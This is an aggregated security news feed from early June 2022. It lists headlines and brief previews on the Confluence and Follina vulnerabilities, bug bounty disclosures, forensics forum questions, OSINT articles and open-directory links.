    Is there a way (maybe an extension) to show thumbnails for image lists like these? It would be nice to see what each item is before clicking it.
    submitted by /u/PmMeUrEncouragements
  • Open

    Linux Hardening techniques
    Introduction Continue reading on InfoSec Write-ups »
    #Part 1 : The reality of modern information security in enterprise around the world.
    No content preview
  • Open

    PCIe DMA Attack against a secured Jetson Nano (CVE-2022-21819)
    Article URL: https://www.thegoodpenguin.co.uk/blog/pcie-dma-attack-against-a-secured-jetson-nano-cve-2022-21819/ Comments URL: https://news.ycombinator.com/item?id=31617467 Points: 23 # Comments: 0
  • Open

    UFED alternative for Samsung
    How can I do a forensic copy of a Samsung smartphone without UFED? Is there any free/open-source software or solution? submitted by /u/Zipper_Ita
  • Open

    Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022-26134)
    CVE-2022-26134 is a critical severity unauthenticated remote code execution vulnerability in Atlassian Confluence Server and Data Center. We share statistics on potentially vulnerable servers and provide suggestions for mitigation. The post Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022-26134) appeared first on Unit42.
  • Open

    The Core of K8s Is the API, Not Containers: From Theory to CRD Practice (2022)
    This article ties together the core parts of the following articles: Kubernetes isn't about containers (2021), Kubernetes is a Database (2019), CRD is just a table in Kubernetes (2020). It argues that the core value of K8s is its general-purpose, cross-vendor, cross-platform, flexibly extensible declarative API framework rather than containers (although containers are the foundation of its success); it then manually creates an API extension (CRD) and uses tests and analogies to build a more intuitive understanding of this argument. Examples and tests are based on K8s v1.21.0; thanks to the original authors for their excellent articles. 1 The core of K8s is its API framework, not containers 1.1 Containers are the foundation 1.2 The API is the core 1.2.1 Before K8s: everyone reinventing the wheel, wrapping over differences in vendor APIs 1.2.2 K8s arrives: standardized, cross-vendor APIs, structures and semantics 1.2.3 Extending the K8s API: CRD 1.3 Summary 2 K8s API types 2.1 Standard APIs (for built-in resource types) 2.1.1 Namespaced types 2.1.2 Un-namespaced types 2.2 Extension APIs (apiextension) 2.2.1 Namespaced types 2.2.2 Un-namespaced types 2.3 CRD 3 An intuitive analogy: K8s is a database, a CRD is a table, the API is SQL 3.1 K8s is a database 3.2 A CRD is a table 3.2.1 Defining the table schema (CRD spec) 3.2.2 Test: CR create/delete/read/update vs. database SQL 3.3 The API is SQL 4 Other 4.1 Labeling CRs and filtering by label 4.2 K8s API and authorization control (R…

  • Open

    Popping Eagle: How Global Analytics Uncovered a Stealthy Threat Actor
    submitted by /u/RamblinWreckGT
    Technical Analysis of Confluence CVE-2022-26134
    submitted by /u/chicksdigthelongrun
    Detecting and mitigating CVE-2022-26134: Zero day at Atlassian Confluence
    submitted by /u/MiguelHzBz
    Meeting Owl Pwnage
    submitted by /u/RudyWaltz
    Released a new version of SCodeScanner. Added YAML scanning ability for scanning Kubernetes configuration files. Github - https://github.com/agrawalsmart7/scodescanner
    submitted by /u/agrawal7
    WinRS and Exchange, a sneaky backdoor
    submitted by /u/picobello_bv
    CVE-2022-30190 : Microsoft Windows Support Diagnostic Tool RCE
    submitted by /u/Late_Ice_9288
  • Open

    Swedish newspaper archive. 1884-2022.
    https://paperarchive-prod.svd.se/ submitted by /u/Pelicaros
    Tons of scans of old books. Some older than the year 1600.
    http://scans.cartago.nl/ I have no idea what these books are about. Thought some of y'all might enjoy. I copied this from the main site: Are you a new visitor or do you want to know more about this site? This section gives you background information about Cartago. Also take a look at the Frequently Asked Questions for more information. What is Cartago? Cartago is the computer system of the Digital Charter Book Groningen and Drenthe. Nearly 35,000 deeds and other documents from before 1600 are included. This makes the sources for medieval culture and history accessible to a wide audience. Cartago is an initiative of the Stichting Digitaal Oorkondeboek Groningen and Drenthe. This foundation consists of representatives of the University of Groningen, the Groninger Archives, the Drents Archive and the former Drents Plateau. Learn more about the organization. Charters as source: The charters are the main sources for Groningen and Drenthe up to 1600. This is special because elsewhere in the Netherlands city accounts, protocols and other registers are usually also available. Anyone who wants to research the Groningen and Drenthe history and culture before 1600 will therefore have to deal with the charters, whether it concerns research into a village, a farm or a family. A charter is a document that serves as proof of a legal act. More information… Who is Cartago intended for? Cartago is suitable for anyone who is researching: genealogy and heraldry, local and regional history, linguistics, onomastics, church history, socio-economic history, legal history. In addition, Cartago focuses on education, including the charter game. Search in Cartago: Via the Search section, visitors can quickly search the database. In addition to the images of the charters, any available transcripts also appear on the screen. A transcript is a translation of the medieval text. Inventories (www.archieven.nl) can also be used to search for deeds. submitted by /u/Pelicaros
    pictures from a hospital in Africa, marked NSFW because of a few images of skin infections of some kind
    submitted by /u/subwaytech
  • Open

    LoveTok — HackTheBox — Web Exploitation — Challenge — Writeup
    Hello guys I am back to posting another writeup. So usually I don’t post writeups about HackTheBox challenges. But this was one of the… Continue reading on Medium »
    Burp Suite: Do I need the professional edition?
    No but it helps Continue reading on Medium »
    My first bug bounty in Business Logic
    Hey Hello, Hackers, Continue reading on Medium »
    Bug Bounty — Continue Penetration Testing
    Continue reading on Medium »
    2FA Bypass due to unauthorized 2FA disabling via X/CSRF
    Product Info Continue reading on Medium »
  • Open

    Understanding REvil: REvil Threat Actors May Have Returned (Updated)
    Ransomware cases worked by Unit 42 consultants in the first six months of 2021 reveal insights into the preferred tactics of REvil threat actors. The post Understanding REvil: REvil Threat Actors May Have Returned (Updated) appeared first on Unit42.
  • Open

    Solving Step 2 of Downtown Murderer without using reverse image search — Hacktoria
    Hacktoria’s monthly CTF in May was Downtown Murderer. There were 6 steps and I will focus in Step 2, which consists in geolocate three… Continue reading on Medium »
    War in Ukraine / June 2
    The first 100 days of the war in Ukraine Continue reading on Medium »
    The OSINT Exposure of Offshore Oil Platforms
    Offshore oil platforms, also known as oil rigs, are large industrial control systems meant to pull and process oil and natural gas from… Continue reading on Medium »
    The reverse image tools I use
    The reverse image tools I use Continue reading on Medium »
  • Open

    8ybhy85kld9zp9xf84x6.imgur.com Subdomain Takeover
    Imgur disclosed a bug submitted by mr_baka: https://hackerone.com/reports/1527405 - Bounty: $50
  • Open

    Apple Silicon “Augury” DMP Vulnerability
    Article URL: https://mjtsai.com/blog/2022/06/03/apple-silicon-augury-dmp-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31610726 Points: 2 # Comments: 0
    U.S. Technology, a Longtime Tool for Russia, Becomes a Vulnerability
    Article URL: https://www.nytimes.com/2022/06/02/business/economy/russia-weapons-american-technology.html Comments URL: https://news.ycombinator.com/item?id=31609058 Points: 3 # Comments: 0
  • Open

    What areas in DFIR are lacking research?
    What are some areas in DFIR that are lacking industry research? What would you want to see more of? submitted by /u/haloman882
    Evidence Mover / Robocopy / Teracopy ?
    Hi all! I have already searched for these keywords and could not locate any previous questions related to this. What are you using for copying evidence from A to B? I have tried the tools mentioned in the title, but I was wondering if there is something different/better. Maybe even command-line? Workstations at work are Windows, so I'm looking for options for Windows. submitted by /u/agente_99
  • Open

    SecWiki News 2022-06-03 Review
    No news updated yet today~ For more of the latest articles, visit SecWiki.
  • Open

    Vulnerability Management Runbook
    Hello guys/gals of this community. Does anyone have experience with creating Vulnerability Management Runbooks? Or any resources that I can lean on? submitted by /u/hannibal_the_general
    Starting with car hacking
    A little backstory first: after 15 years in various software development roles (using mostly C and C++), I have lost all motivation about the field. Recently, I came across the research of Charlie Miller and Chris Valasek, and it sparked my interest in tech again. So the question is, what and from where do I start learning networking to be able to break into the car pentesting industry? I know very basic stuff, like subnetting, but not much more. Most tutorials on the internet do not go beyond just being able to answer the CCNA test's questions. submitted by /u/Idonotlikeworking
    I need help
    So someone I know has had her SNS accounts hacked; she gets notified via email if her FB is being tapped into. The email shows the device name. What I'm asking is whether it's possible to trace the device name, or at least the IP address, using the device name. submitted by /u/IncidentMinimum
  • Open

    Java Deserialization Basics: JDK Dynamic Proxies
    Java Deserialization Basics: JDK Dynamic Proxies. One article to help you sort out what exactly JDK dynamic proxies are, laying the groundwork for the later CC chain analysis.
    Using a Maze as an Analogy for PHP Deserialization Chains
    Using maze-walking as an analogy for PHP deserialization chains; offers an approach to analyzing deserialization vulnerabilities in PHP frameworks for readers who already understand the basic principles of PHP deserialization vulnerabilities.
  • Open

    Kubernetes 101 | Setting up Kubernetes Cluster Locally
    This blog is about setting the local Kubernetes cluster for learning & testing using multiple tools like Kind, Minikube, Kubeadm & K3s. Continue reading on InfoSec Write-ups »
    Enumeration and lateral movement in GCP environments
    No content preview
    Android Pentesting Methodology (Pt. 1)
    No content preview
  • Open

    Cve-2022-26134: Active Exploitation of Atlassian Confluence
    Article URL: https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ Comments URL: https://news.ycombinator.com/item?id=31604711 Points: 2 # Comments: 0
    CVE-2022-26134: RCE in Atlassian Confluence and Data Center products
    Article URL: https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data Comments URL: https://news.ycombinator.com/item?id=31604258 Points: 3 # Comments: 1
  • Open

    Red Team Server
    Red Team Server (RTS) Continue reading on Medium »

  • Open

    Daily Cyber Brief
    submitted by /u/RandyMarsh_Lorde
    Exploiting CVE-2022-26923 by Abusing AD CS
    We are doing 2 THM Labs. In the first one we are abusing vulnerable certificate templates manually with Certify and Rubeus, then changing the domain Administrator's password. In the second lab, we are utilizing the Certipy POC to take over the DC machine and dump hashes for all users. Available on YouTube: https://youtu.be/HBRCI5O35R8 Hope you enjoy the video and learn something new. The channel is new and all feedback is appreciated. submitted by /u/lsecqt
  • Open

    Unauthenticated Remote Code Execution in Atlassian Confluence (CVE-2022-26134)
    submitted by /u/sullivanmatt
    Mining Google Chrome CVE data
    submitted by /u/onlinereadme
  • Open

    Confluence – Critical unauthenticated remote code execution vulnerability
    Article URL: https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html Comments URL: https://news.ycombinator.com/item?id=31601794 Points: 10 # Comments: 3
    Illumina Cybersecurity Vulnerability
    Article URL: https://www.fda.gov/medical-devices/letters-health-care-providers/illumina-cybersecurity-vulnerability-may-present-risks-patient-results-and-customer-networks-letter Comments URL: https://news.ycombinator.com/item?id=31600655 Points: 1 # Comments: 0
  • Open

    Popping Eagle: How We Leveraged Global Analytics to Discover a Sophisticated Threat Actor
    We observed a specially crafted DLL hijacking attack used by a previously unknown piece of malware that we dubbed Popping Eagle. The post Popping Eagle: How We Leveraged Global Analytics to Discover a Sophisticated Threat Actor appeared first on Unit42.
  • Open

    Embedding Python Malware
    Writing malware in C is cool. What’s cooler? Writing malware in Python and embedding it in C-based malware. Let’s learn how to do that. Continue reading on Medium »
  • Open

    iPhone remotely wiped inside Faraday box
    I have an iPhone 11 that was remotely wiped while it was inside a Faraday cage. The phone was turned on while it was inside the cage; it booted into the "lost phone" screen for less than a second and then it began the wiping process. Any ideas on how something like this could happen? submitted by /u/croforensic
    Internship/Mentorship opportunities
    Hello all, I'm currently pursuing my Bachelor's degree in Computer Forensics and Digital Investigation. I will be graduating next year and wanted to ask if anyone knew some places I can apply to for an internship, or if anyone has mentorship programs. I want to get my foot in the door and start doing some hands-on work and learning the day-to-day work style. I would really appreciate any help or information on this matter. Thank you all in advance. submitted by /u/Sudden_Ad9859
    FTK Imager error
    Hi, I did an FTK image of an SSD. I started and everything went well until FTK got to the point where it was verifying the image, when I got this message: "imager encountered 32 error(s). the image is corrupted imager will attempt to retrieve remaining valid data". It still started to do a verification check afterwards and, no surprise, it did end up not matching. But my question is: what does it mean? Does it have something to do with the cables? The data on the SSD? Or something else? If I understand it correctly I'm only copying the image, so corrupted files shouldn't be a problem, right? Also, I'm taking an image from a Windows computer's SSD. submitted by /u/Gackie
    Chain of custody form
    Do you recommend the proposal of changing the traditional hardcopy chain-of-custody form to a digital chain of custody? And why so? submitted by /u/alialibarrett
    SMS Forensics - Android
    Assuming I have an unlocked Android phone, I'd like to test mobile forensics tools, especially with SMS. Any recommendations on tools & techniques to image, parse, and extract SMS info from an Android device? I want to be able to answer questions like: When was a message sent/received? Has the timestamp been tampered with? Does it recognize different time zones and then normalize the timestamps? Thank you. submitted by /u/trafficbridge
  • Open

    More Misc Stuff
    submitted by /u/ilikemacsalot
    Misc Stuff
    submitted by /u/ilikemacsalot
    A few movies & series
    http://51.68.207.131/ Not a lot here, but did see some newer content. submitted by /u/dasheswithdots
    photos of car parts
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Australian aviation photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME
  • Open

    Mining Google Chrome CVE Data
    Article URL: https://clearbluejar.github.io/posts/mining-google-chrome-cve-data/ Comments URL: https://news.ycombinator.com/item?id=31599584 Points: 2 # Comments: 0
    Using the Kani Rust Verifier on a Rust Standard Library CVE
    Article URL: https://model-checking.github.io//kani-verifier-blog/2022/06/01/using-the-kani-rust-verifier-on-a-rust-standard-library-cve.html Comments URL: https://news.ycombinator.com/item?id=31594351 Points: 3 # Comments: 0
  • Open

    The Fuzzing Book
    Article URL: https://www.fuzzingbook.org/ Comments URL: https://news.ycombinator.com/item?id=31598335 Points: 39 # Comments: 1
  • Open

    How to scope what hardware I need for network monitoring?
    Hi there. I need a consultation. What is the step-by-step algorithm to understand what hardware specifications (CPU, RAM, disks) I need? I tried to set up ELK+Suricata+Zeek on a VM server: 16 CPUs, 32 GB RAM, two disks totalling 950 GB (a 450 GB OS disk and 500 GB dedicated to Elasticsearch). But the amount of processing done by Zeek and Suricata made it a noisy neighbour for other VMs and was killing the hypervisor, so I need to migrate to physical servers, but I don't know how to calculate hardware specifications. submitted by /u/athanielx
    How do you review and document Cyber Security implementation?
    How do you review and document Cyber Security implementation in an organization? submitted by /u/techno_it
    Hardware Raspberry Pi ad-blocker hooked up to WiFi, secure?
    Been using normal adblockers since they came about, but I do not like all the data they are getting. How secure is a Raspberry Pi blocker hooked up to my WiFi? Will it cause problems if I, say, use streaming services on my TV, for example? Because some adblockers in the past have been iffy when it comes to "real" streaming services with ads. And since this will be hardware, I would rather not unplug it if I need to watch a TV channel's streaming app etc. (I mainly want the adblocker for YouTube.) I want to make as safe a closed ecosystem as I can, and still use technology somewhat normally. I'm in the process of securing up everything I've got, times 2. If anyone has other solid tips that I can do on my own (without losing access to normal things) I am happy to hear them. Of course I always do the usual basic stuff, setting everything I can via GUI to barebones at first installation of every program. Battling cookies like 50 times per day the last few years, etc. etc. etc. It's all so tiresome. submitted by /u/bukush
  • Open

    War in Ukraine / June 1
    Because of Russia’s war, European countries are reconsidering their military policies Continue reading on Medium »
    Cybersecurity in Costa Rica from the Hand of a Non-Expert
    IT Now IT NOW Let's talk about cybersecurity. Continue reading on Medium »
    Clean Your Images— OSINT Challenge 25
    We have a really short one for this round of quizzes. Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective… Continue reading on Medium »
    What Is Open Source Intelligence (OSINT)?
    What Is Open Source Intelligence (OSINT)? Continue reading on Medium »
  • Open

    SecWiki News 2022-06-02 Review
    RAND in-depth report: an overview of US commercial space capabilities and markets, by ourren; Redefining SOAR, by ourren; FirmSec: security research on third-party components in IoT firmware, by ourren; Analysis of CobaltStrike WebServer characteristics, by ourren; Fuzzm: fuzzing WebAssembly for memory errors, by ourren. For more of the latest articles, visit SecWiki.
  • Open

    US BIS Issues Cybersecurity Export Ban; Global Vulnerability-Sharing Mechanism Faces Serious Challenge
    After BIS issued these new rules, tech giants such as Microsoft expressed concern that the global mechanism for sharing cybersecurity vulnerabilities may well face a serious challenge.
    "Operation Hunting Pictures": Analysis of a Data-Theft Campaign Targeting NFT Artists
    Based on attack techniques, C2 addresses and other characteristics, the activity was attributed to a large-scale data-theft campaign launched by a single attack group; since the attackers' main targets were NFT artworks, Antiy named the campaign "Operation Hunting Pictures".
    FreeBuf Weekly | 3.6 Million+ MySQL Servers Exposed on the Internet; Anonymous Claims It Will Attack Belarus
    In the computing industry, "delete the database and run" has long been a catchphrase programmers use to vent work stress.
    A Brief Analysis of an Excel Email Attack Sample
    This email attack exploits CVE-2017-11882 (the EQNEDT32.EXE Equation Editor vulnerability).
    Telegraph May Already Be Widely Abused in Phishing
    Recently, observers found that Telegraph, the anonymous blogging platform of the messaging app Telegram, may be being actively abused by phishers.
    An Employee "Deletes the Database and Runs": Can They Really Just Walk Away?
    Hard to imagine, but fantasy has become reality: someone was actually "bold enough" to try deleting the database and running, hoping to just walk away.
    SlowMist: Analysis of the NFT Project verb Phishing Site
    Stay skeptical of everything.
    FreeBuf Morning Report | Twice as Many Healthcare Organizations Paying Ransoms as Before; Three Quarters of Companies Suffer Downtime from DNS Attacks
    Nearly three quarters of companies suffered downtime due to DNS attacks.
    Hundreds of Elasticsearch Databases Hit by Ransom Attacks
    Weak security protections on Elasticsearch databases have made them a target for hackers.
    Major Security Event! 3.6 Million+ MySQL Servers Exposed on the Internet
    At least 3.6 million MySQL servers are exposed on the internet, and they will undoubtedly become highly attractive targets for hackers and ransomware attackers.
    Europol Announces Takedown of the FluBot Malware
    In a recent joint law-enforcement operation involving 11 countries, Europol announced the official takedown of FluBot, a malware operation that mainly targeted users' online banking accounts.
    Key Points in Cryptographic Application Security Assessment: Digital Signature Technology
    Digital signature technology is an excellent solution in modern cryptography that combines asymmetric cryptographic algorithms with message digest algorithms; it is widely applied and involves many knowledge points.
  • Open

    Complete Bug Bounty CheatSheet | Joas Antonio
    XSS, SQLi, SSRF, CRLF, CSV-Injection, Command Injection, Directory Traversal, LFI, XXE, Open-Redirect, RCE, Crypto, Template Injection… Continue reading on Medium »
    How I Mass hunt for Admin Panel Access…
    Hello All,🙂 Continue reading on Medium »
    Reverse Engineering Discord’s Party Mode
    Continue reading on Dev Genius »
    HTML Injection On Trio App
    Hey Hackers!!! I am back again! My name is Krishnadev P Melevila, To know more about me, Search on Google “ Who is Krishnadev P Melevila”! Continue reading on Medium »
    HTML Injection On Trio App
    Hey Hackers!!! I am back again! My name is Krishnadev P Melevila, To know more about me, Search on Google “ Who is Krishnadev P Melevila”! Continue reading on InfoSec Write-ups »
  • Open

    AWS Load Balancer Controller Managed Security Groups can be replaced by an unprivileged attacker
    Kubernetes disclosed a bug submitted by t0rr3sp3dr0: https://hackerone.com/reports/1238017 - Bounty: $500
    AWS Load Balancer Controller can be used by an attacker to modify rules of any Security Group that they are able to tag
    Kubernetes disclosed a bug submitted by t0rr3sp3dr0: https://hackerone.com/reports/1238482 - Bounty: $500

  • Open

    Real Player Remote Arbitrary Code Execution Vulnerability
    Article URL: https://github.com/Edubr2020/RP_DCP_Code_Exec Comments URL: https://news.ycombinator.com/item?id=31589107 Points: 2 # Comments: 1
    A powerful vulnerability scanner for Windows, macOS and Linux that you will love
    Article URL: https://www.mageni.net/ Comments URL: https://news.ycombinator.com/item?id=31588325 Points: 2 # Comments: 0
    CVE-2022-23088 – FreeBSD Network Subsystem Remote Code Execution Vulnerability
    Article URL: https://www.freebsd.org/security/advisories/FreeBSD-SA-22:07.wifi_meshid.asc Comments URL: https://news.ycombinator.com/item?id=31583875 Points: 1 # Comments: 1
    Microsoft Office zero-day vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190 Comments URL: https://news.ycombinator.com/item?id=31580756 Points: 6 # Comments: 0
  • Open

    SANS FOR500 with no prior forensic experience?
    I am currently a Threat Intelligence Analyst. I was thinking about taking the FOR500 since I want to transition to Forensics. I am hesitant since I have no forensic experience/knowledge. Coming from a non-technical background, would you recommend this course? submitted by /u/hackprincess
    Avilla Forensics 3.0
    https://github.com/AvillaDaniel/AvillaForensics 🔎 A very powerful set of tools for a forensic specialist. For full-fledged work, Java and Python are required (packages: instaloader, mvt, pycryptodome and Whacipher). To work with smartphones, they must have debugging mode enabled. But the abundance of capabilities that we get for free is just amazing. Yes, there are products from Oxygen Software in Russia, but they are paid, although not much better, probably only in working with cloud services like Oxygen, which is not enough; but do not forget that this is all completely free. submitted by /u/saqfi
  • Open

    Exfiltrate GDrive access token using CSRF
    Dropbox disclosed a bug submitted by staz0t: https://hackerone.com/reports/1468010 - Bounty: $1728
    user can bypass password enforcement when federated sharing is enabled
    Nextcloud disclosed a bug submitted by michag86: https://hackerone.com/reports/838510 - Bounty: $250
  • Open

    Security Validation Tools
    Hey all, I was listening to a webinar today and one of the experts brought up security validation tools, which I hadn't heard of before. I was curious if folks are using any of these, and what are they using? The way it was explained is a potential red team or other smaller team looking to find gaps in their own security. Some background: I've brought my company huge strides over the past 5 years improving our cyber program from training, monitoring, pentesting, everyday preventative tools, and annual 3rd-party program maturation, but I don't know what I don't know, so I'm very curious. Appreciate everyone's time. submitted by /u/derf3970
    Ditching the OOTB SIEM
    After a less than successful SIEM transition, I am starting to look at the possibility of building a SIEM by integrating multiple COTS products. Essentially looking at integrating a data lake, XDR/correlation capability and a SOAR solution. Has anyone successfully done this (aside from Palo's SOC) and have any input/feedback to share? submitted by /u/Omnipotent0ne
  • Open

    Some flicks
    http://www.lemaurecourtois.com/film/ submitted by /u/DismalDelay101
    Teaching Content site...! probably boring
    https://www.futuremanagers.com/wp-content/uploads/ submitted by /u/RE167
    Index of movies and media
    https://setnomanime.me/9:/Movies/ submitted by /u/Isolatedleliel
  • Open

    Seven Essential Questions for Ethical War Crimes Documentation
    Considerations for those collecting, investigating, and analyzing open source information in Ukraine and elsewhere Continue reading on Human Rights Center »
    War in Ukraine / May 31
    Difficult situation in Severodonetsk Continue reading on Medium »
  • Open

    How I found a GoldMine but got No Gold
    Background: Continue reading on Medium »
    Kubernetes 101 | Setting up Kubernetes Cluster Locally
    This blog is about setting the local Kubernetes cluster for learning & testing using multiple tools like Kind, Minikube, Kubeadm & K3s. Continue reading on InfoSec Write-ups »
    Microsoft Dynamics Container Sandbox RCE via Unauthenticated Docker Remote API 20,000$ Bounty
    On 17.11.2021 I reported a critical security issue in Microsoft Dynamics Container Sandbox, that allows Microsoft Customers to setup a… Continue reading on Medium »
    Cryptography a Foundation of Cyber Security.
    Continue reading on Medium »
    Part 2: A pragmatic guide to building your bug bounty program
    Budgets and payments, and dealing with beg bounties Continue reading on Airwallex Engineering »
    WordPress User Meta Lite / Pro 2.4.3 Suffers Path Traversal Exploit
    More @ https://skynettools.com  Currently the WordPress Plugin User Meta 2.4.3, both Lite and Pro is vulnerable to a Path Traversal… Continue reading on Medium »
    Good to see you back. I have always loved your write ups. Simple and to the point. Keep it up
    Continue reading on Medium »
  • Open

    Using Python to unearth a goldmine of threat intelligence from leaked chat logs
    submitted by /u/SCI_Rusher
    Information Security BASICS - Anvil Secure
    submitted by /u/anvilventures
    Unofficial patches for the 0-day vulnerability called Follina (CVE-2022-30190)
    submitted by /u/CyberMasterV
    GCP exploitation & lateral movement write up! - @securfreakazoid
    submitted by /u/securfreakazoid
    Twitch Internal Security Tools: In-depth Analysis of the Leaked Twitch Security Tools
    submitted by /u/mazen160
    Sushi Time: Hunting for Fresh Phish
    submitted by /u/0xDAV1D
    OST2 Vulnerabilities 1001: C-Family Software Implementation Vulnerabilities (Taught via explaining > 3 dozen CVEs from the last 3 years)
    submitted by /u/OpenSecurityTraining
    Minerva's evasion based CTF is open for registration
    submitted by /u/woja111
  • Open

    Enumeration and lateral movement in GCP environments
    This write up is about a pentest we did in which we managed to compromise a hybrid GCP hosted infrastructure using native GCP tools for… Continue reading on InfoSec Write-ups »
    Home-Grown Red Team: Using PhishPi For Captive Portal Evil Twin Attacks And Website Cloning
    A captive portal is one of the more interesting topics in the Wifi hacking arena. If you’re not familiar with what a captive portal is or… Continue reading on Medium »
  • Open

    Code Intelligence raises $12M to build dev-first advanced fuzzing solutions
    Article URL: https://www.code-intelligence.com/blog/series-a Comments URL: https://news.ycombinator.com/item?id=31584225 Points: 4 # Comments: 0
  • Open

    CVE-2022-23088 – FreeBSD Network Subsystem Remote Code Execution Vulnerability
    Article URL: https://www.freebsd.org/security/advisories/FreeBSD-SA-22:07.wifi_meshid.asc Comments URL: https://news.ycombinator.com/item?id=31583875 Points: 1 # Comments: 1
  • Open

    SecWiki News 2022-06-01 Review
    Research report on the impact of the Bluetooth protocol on automotive security by lxghost; The dilemma of SCA and the way out by ourren; A summary and primer on graph neural networks and cognitive reasoning by ourren; SSL fingerprinting and bypass by ourren; APICraft: generating fuzz drivers for closed-source SDK libraries by ourren. For more recent articles, visit SecWiki
  • Open

    Browser automation frameworks become tools for attackers
    More and more threat actors are using free browser automation frameworks as part of their attack campaigns.
    How to use C2concealer to generate randomized C2 Malleable profiles
    C2concealer is a powerful command-line tool that lets researchers easily generate randomized C2 Malleable profiles.
    How to use ShadowClone to get the most out of cloud services
    ShadowClone lets us make full use of the free tier offered by cloud providers and greatly amplifies the reach of command-line tools.
    IoT endpoint security from the ground up: playing with IoT firmware (Part 1)
    This installment covers how to obtain firmware from IoT endpoint devices and techniques for extracting and analyzing the file system.
    FreeBuf Morning Report | US publishes guidance for building public research data repositories; scammers exploit the Russia-Ukraine conflict to collect "donations"
    The US White House Office of Science and Technology Policy (OSTP) recently published guidance on the desirable characteristics of data repositories for federally funded research.
    Go fuzzing (Part 1): go-fuzz
    An introduction to using go-fuzz, a fuzzing tool for Go.
    FreeBuf in-house security group discussion | Have you experienced threat false positives?
    Faced with a large number of new vulnerabilities, how do you filter out the ones that pose a real threat, judge them quickly and reliably, and reduce the false positive rate?
    Breaking down the 2021 OWASP Top 10 one by one: A04:2021 – Insecure Design
    This article focuses on A02 Cryptographic Failures.
    Microsoft MSDT zero-day used to land a Cobalt Strike beacon
    The zero-day reportedly affects multiple Microsoft Office versions, including Office, Office 2016 and Office 2021.
    Quietly, Google has banned deepfake projects on Colab
    Reports indicate that Google recently and quietly banned deepfake projects on its Colaboratory service.
    Obtaining remote Windows host information via DCERPC and NTLMSSP
    This article uses a DCERPC ping with NTLMSSP authentication data attached to obtain the version number and other information about a remote Windows host.
    Scammers exploit the Russia-Ukraine conflict to collect "donations" at scale
    The FBI found scammers impersonating legitimate Ukrainian humanitarian aid organizations and collecting donations on the pretext of helping Ukrainian refugees and war victims.
    Analysis of a Mahacao (摩诃草) campaign using Pakistani government agency documents as lures
    Background: Mahacao (摩诃草), also known as Hangover, Patchwork, White Elephant (白象) and other names, is tracked internally by Qi An Xin as APT-Q-36.
    DataCloak (数篷科技): a zero-trust data security solution for the full data lifecycle | Cybersecurity New Forces SOLO Launch Season
    How should enterprise security respond to the new challenges of its environment? The Cybersecurity New Forces SOLO Launch Season tells you!
    Quick look: the fix for the Microsoft MSDT zero-day is here
    On May 30, Microsoft published mitigations that block attackers from using the zero-day to launch remote attacks.
  • Open

    How I am winning battle with Windows 10 and 11 Security and avoiding detection
    No content preview
  • Open

    Tryhackme linuxloganalysis Writeup
    No content preview
    Tryhackme ramanalysis Writeup
    No content preview
    Tryhackme tsharkpcapanalysis Writeup
    No content preview
    SSO: A Secure way for authentication and authorization ?
    Introduction Continue reading on InfoSec Write-ups »
    Tryhackme Pcap Analysis Room Official Writeup
    No content preview
    HackThebox: Lame
    No content preview
    Erlik Machine Writeup
    No content preview
    Serial Communication with Raspberry Pi Pico in Windows 10/11 via WSL
    No content preview
    Top 5 Hacking Book , Must Read !!
    No content preview
    Persistent Windows 10 and 11 keylogger (keylogiq)
    No content preview
  • Open

    Threat Brief: CVE-2022-30190 – MSDT Code Execution Vulnerability
    CVE-2022-30190 enables remote code execution with the same privileges as the calling application, and there are proof-of-concept examples of zero-click variants. We recommend protections and mitigations. The post Threat Brief: CVE-2022-30190 – MSDT Code Execution Vulnerability appeared first on Unit42.
    Network Security Trends: November 2021 to January 2022
    Network security trends observed November 2021 to January 2022 included high levels of cross-site scripting. The post Network Security Trends: November 2021 to January 2022 appeared first on Unit42.
  • Open

    Django debug enabled showing information about system, database, configuration files
    Glovo disclosed a bug submitted by omarelfarsaoui: https://hackerone.com/reports/1561377
    Deprecated owners.query API bypasses object view policy
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1584409 - Bounty: $300
    Able to bypass the fix on DOM XSS at [www.adobe.com]
    Adobe disclosed a bug submitted by saajanbhujel: https://hackerone.com/reports/1398374
    DOM XSS on www.adobe.com
    Adobe disclosed a bug submitted by saajanbhujel: https://hackerone.com/reports/1260825
    CSRF token validation system is disabled on Stripe Dashboard
    Stripe disclosed a bug submitted by rodolfomarianocy: https://hackerone.com/reports/1493437 - Bounty: $2500
    Improper input-size validation on the user new session name can result in server-side DDoS.
    Nextcloud disclosed a bug submitted by demonia: https://hackerone.com/reports/1153138 - Bounty: $100
    Blind XSS on https://open.vanillaforums.com
    Vanilla disclosed a bug submitted by mohit0786: https://hackerone.com/reports/1189885 - Bounty: $300
    Self XSS in attachments name
    Acronis disclosed a bug submitted by mega7: https://hackerone.com/reports/1536901
  • Open

    How Fuzzing helps me to get my first bounty?
    Hello Everyone, Continue reading on Medium »
    Astar Network Hosts a $1 million Bug Bounty Program on Immunefi
    05/31/2022 — We are launching a bug bounty program with Immunefi, Web3’s leading bug bounty platform, already protecting $100 billion in… Continue reading on Astar Network »
    From open redirect to RCE in one week
    I will tell you a story of how I chained multiple security issues to achieve RCE on several hosts of the Mail.Ru Group (or VK now). Continue reading on Medium »
    RootME: walkthrough
    Once again back with another story of hacking on the TryHackMe platform.The room this time a free room anyone can give it a try without a… Continue reading on Medium »
    Abusing Facebook’s feature for a permanent account confusion (logic vulnerability)
    TLDR; Logic vulnerability on Facebook led to half 2FA bypass/denial of service by locking users to login into the attacker’s controlled… Continue reading on Medium »
    SQL injection to Remote Command Execution (RCE)
    Hello hackers, before we get into it, I would like to know your view of this — between a hacker’s curiosity and instinct which would you… Continue reading on Medium »
    Price Parameter Tampering | How I Change Any Price on Website
    Hi everyone, how are you? I hope you guys are well. I'm RyuuKhagetsu, this is my article in English, sorry if there are any mistakes. I… Continue reading on Medium »
    Web service-specific vulnerability scanners
    Vulnerability scanners are automated tools that crawl an application to identify the signatures of known vulnerabilities. Continue reading on Medium »
